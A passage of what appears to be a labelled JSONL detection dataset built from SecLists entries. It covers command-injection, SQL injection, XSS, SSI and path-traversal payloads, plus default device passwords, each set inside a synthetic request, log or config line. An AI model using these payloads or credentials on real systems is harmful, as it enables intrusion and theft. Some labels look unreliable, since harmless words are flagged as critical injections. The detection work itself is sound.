"%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22", "injection_type": "cmd"}}]} {"id": "seclists_02146", "source": "seclists", "source_license": "MIT", "text": "password: OpenConnect,adminstat,OCS,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "OpenConnect,adminstat,OCS,"}}]} {"id": "seclists_02147", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\0\\0\\0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\0\\0\\0", "injection_type": "cmd"}}]} {"id": "seclists_02148", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %27%0aecho$IFSHPJBTS$((68%2B1))$(echo$IFSHPJBTS)HPJBTS", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0aecho$IFSHPJBTS$((68%2B1))$(echo$IFSHPJBTS)HPJBTS", "injection_type": "cmd"}}]} {"id": "seclists_02149", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\" or \"x\"=\"x HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or \"x\"=\"x", "injection_type": "SQL"}}]} {"id": "seclists_02150", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:AMX,NetLinx,password,http://www.amx.com/techsupport/PDFs/981.pdf", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "AMX,NetLinx,password,http://www.amx.com/techsupport/PDFs/981.pdf"}}]} {"id": "seclists_02151", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><kbd id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></kbd> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><kbd id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></kbd>", "injection_type": "XSS"}}]} {"id": "seclists_02152", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"user_name\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"user_name\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02153", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"script_filename\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"script_filename\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02154", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'distinct';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "distinct", "injection_type": "SQL"}}]} {"id": "seclists_02155", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: aim: uri exploit HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: aim: uri exploit", "injection_type": "XSS"}}]} {"id": "seclists_02156", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, html breaking, obfuscated, user interaction</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, html breaking, obfuscated, user interaction", "injection_type": "XSS"}}]} {"id": "seclists_02157", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_02158", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<a draggable=\"true\" ondragleave=\"alert(1)\">test</a>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<a draggable=\"true\" ondragleave=\"alert(1)\">test</a>", "injection_type": "XSS"}}]} {"id": "seclists_02159", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%20'sleep%2050' HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20'sleep%2050'", "injection_type": "cmd"}}]} {"id": "seclists_02160", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3Becho$IFSGCRBKK$((37%2B88))$(echo$IFSGCRBKK)GCRBKK\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho$IFSGCRBKK$((37%2B88))$(echo$IFSGCRBKK)GCRBKK\\", "injection_type": "cmd"}}]} {"id": "seclists_02161", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <DIV STYLE=\"width: expression(alert('XSS'));\"> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <DIV STYLE=\"width: expression(alert('XSS'));\">", "injection_type": "XSS"}}]} {"id": "seclists_02162", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '\\x27UNION SELECT';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x27UNION SELECT", "injection_type": "SQL"}}]} {"id": "seclists_02163", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Webramp,wradmin,trancell,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Webramp,wradmin,trancell,"}}]} {"id": "seclists_02164", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"query_string\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"query_string\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02165", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = or a=a", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or a=a", "injection_type": "SQL"}}]} {"id": "seclists_02166", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: Firefox Lookups 2\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Firefox Lookups 2", "injection_type": "XSS"}}]} {"id": "seclists_02167", "source": "seclists", "source_license": "MIT", "text": "filename=%00/", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%00/", "injection_type": "cmd"}}]} {"id": "seclists_02168", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_02169", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=${system(print(`echo%20QIHVTW`.`echo%20$((76%2B48))`.`echo%20QIHVTW`.`echo%20QIHVTW`)%3BQIHVTW HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${system(print(`echo%20QIHVTW`.`echo%20$((76%2B48))`.`echo%20QIHVTW`.`echo%20QIHVTW`)%3BQIHVTW", "injection_type": "cmd"}}]} {"id": "seclists_02170", "source": "seclists", "source_license": "MIT", "text": "password: raistlin\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "raistlin"}}]} {"id": "seclists_02171", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: ha.ckers.org</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_02172", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><var onbeforecopy=\"alert(1)\" contenteditable>test</var></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<var onbeforecopy=\"alert(1)\" contenteditable>test</var>", "injection_type": "XSS"}}]} {"id": "seclists_02173", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<progress draggable=\"true\" ondragleave=\"alert(1)\">test</progress> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<progress draggable=\"true\" ondragleave=\"alert(1)\">test</progress>", "injection_type": "XSS"}}]} {"id": "seclists_02174", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:yogibear@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "yogibear"}}]} {"id": "seclists_02175", "source": "seclists", "source_license": "MIT", "text": "password: Micron,<N/A>,xyzall,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Micron,<N/A>,xyzall,"}}]} {"id": "seclists_02176", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=|| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||", "injection_type": "cmd"}}]} {"id": "seclists_02177", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27", "injection_type": "cmd"}}]} {"id": "seclists_02178", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x onmousemove=alert(1)>hover this!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x onmousemove=alert(1)>hover this!", "injection_type": "XSS"}}]} {"id": "seclists_02179", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\" or \"a\"=\"a HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or \"a\"=\"a", "injection_type": "SQL"}}]} {"id": "seclists_02180", "source": "seclists", "source_license": "MIT", "text": "filename=%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_02181", "source": "seclists", "source_license": "MIT", "text": "filename=\" or 1=1 or \"\"=\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or 1=1 or \"\"=\"", "injection_type": "cmd"}}]} {"id": "seclists_02182", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin' or 1=1/* HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' or 1=1/*", "injection_type": "SQL"}}]} {"id": "seclists_02183", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">hash</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "hash", "injection_type": "XSS"}}]} {"id": "seclists_02184", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = ')%20or%20('x'='x';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")%20or%20('x'='x", "injection_type": "SQL"}}]} {"id": "seclists_02185", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: INPUT Image HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: INPUT Image", "injection_type": "XSS"}}]} {"id": "seclists_02186", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ');}print(`echo%20EKPEWV%0aecho%20$((50%2B69))%0aecho%20EKPEWV%0aecho%20EKPEWV`)%3BEKPEWV", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "');}print(`echo%20EKPEWV%0aecho%20$((50%2B69))%0aecho%20EKPEWV%0aecho%20EKPEWV`)%3BEKPEWV", "injection_type": "cmd"}}]} {"id": "seclists_02187", "source": "seclists", "source_license": "MIT", "text": "password: Tripp Lite,root,TrippLite,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Tripp Lite,root,TrippLite,"}}]} {"id": "seclists_02188", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context. HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context.", "injection_type": "XSS"}}]} {"id": "seclists_02189", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=; ping 127.0.0.1 ; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "; ping 127.0.0.1 ;", "injection_type": "cmd"}}]} {"id": "seclists_02190", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:RM,<N/A>,RM,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "RM,<N/A>,RM,"}}]} {"id": "seclists_02191", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: >\"' HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: >\"'", "injection_type": "XSS"}}]} {"id": "seclists_02192", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><x 1=\">\" onxxx=1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x 1=\">\" onxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_02193", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"DOCUMENT_URI\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"DOCUMENT_URI\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02194", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, obfuscated, internet explorer, URL breaking</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, obfuscated, internet explorer, URL breaking", "injection_type": "XSS"}}]} {"id": "seclists_02195", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:D-Link,admin,none,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "D-Link,admin,none,"}}]} {"id": "seclists_02196", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><div draggable=\"true\" contenteditable>drag me</div><map ondrop=alert(1) contenteditable>drop here</map></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><map ondrop=alert(1) contenteditable>drop here</map>", "injection_type": "XSS"}}]} {"id": "seclists_02197", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'exec(@s)';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "exec(@s)", "injection_type": "SQL"}}]} {"id": "seclists_02198", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:sneaky@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "sneaky"}}]} {"id": "seclists_02199", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = admin\") or (\"1\"=\"1\"--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\") or (\"1\"=\"1\"--", "injection_type": "SQL"}}]} {"id": "seclists_02200", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &echo$IFSRXZUMT$((27%2B20))$(echo$IFSRXZUMT)RXZUMT%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&echo$IFSRXZUMT$((27%2B20))$(echo$IFSRXZUMT)RXZUMT%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02201", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>", "injection_type": "XSS"}}]} {"id": "seclists_02202", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Netgear,admin,setup,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Netgear,admin,setup,"}}]} {"id": "seclists_02203", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 1/*';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1/*", "injection_type": "SQL"}}]} {"id": "seclists_02204", "source": "seclists", "source_license": "MIT", "text": "filename=%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_02205", "source": "seclists", "source_license": "MIT", "text": "username=union all select @@version--&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "union all select @@version--", "injection_type": "SQL"}}]} {"id": "seclists_02206", "source": "seclists", "source_license": "MIT", "text": "filename=%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "injection_type": "cmd"}}]} {"id": "seclists_02207", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=execInfo HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "execInfo", "injection_type": "SSTI"}}]} {"id": "seclists_02208", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22|echo$IFSMNAWIZ$((59%2B73))$(echo$IFSMNAWIZ)MNAWIZ\\ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22|echo$IFSMNAWIZ$((59%2B73))$(echo$IFSMNAWIZ)MNAWIZ\\", "injection_type": "cmd"}}]} {"id": "seclists_02209", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = 1) or benchmark(10000000,MD5(1))#", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1) or benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]} {"id": "seclists_02210", "source": "seclists", "source_license": "MIT", "text": "filename=%27;echo$IFSHOOXVC$((69%2B30))$(echo$IFSHOOXVC)HOOXVC%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27;echo$IFSHOOXVC$((69%2B30))$(echo$IFSHOOXVC)HOOXVC%27", "injection_type": "cmd"}}]} {"id": "seclists_02211", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:screamer", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "screamer"}}]} {"id": "seclists_02212", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=A HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "A", "injection_type": "cmd"}}]} {"id": "seclists_02213", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23", "injection_type": "cmd"}}]} {"id": "seclists_02214", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22;echo%20SQMNBY$((85%2B74))$(echo%20SQMNBY)SQMNBY\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22;echo%20SQMNBY$((85%2B74))$(echo%20SQMNBY)SQMNBY\"", "injection_type": "cmd"}}]} {"id": "seclists_02215", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=allmine\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "allmine"}}]} {"id": "seclists_02216", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd", "injection_type": "cmd"}}]} {"id": "seclists_02217", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_user_agent\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_user_agent\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02218", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\"echo$IFSWKATIV$((60%2B61))$(echo$IFSWKATIV)WKATIV HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"echo$IFSWKATIV$((60%2B61))$(echo$IFSWKATIV)WKATIV", "injection_type": "cmd"}}]} {"id": "seclists_02219", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=kinder\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "kinder"}}]} {"id": "seclists_02220", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a=\u201d$ENV{QUERY_STRING}\u201d;</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a=\u201d\u201d;alert('XSS');//\u201d;</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a=\u201d$ENV{QUERY_STRING}\u201d;</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a=\u201d\u201d;alert('XSS');//\u201d;</SCRIPT> which ends up un-escaping the double quote and c", "injection_type": "XSS"}}]} {"id": "seclists_02221", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>@keyframes x{}</style><listing style=\"animation-name:x\" onanimationend=\"alert(1)\"></listing></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><listing style=\"animation-name:x\" onanimationend=\"alert(1)\"></listing>", "injection_type": "XSS"}}]} {"id": "seclists_02222", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": 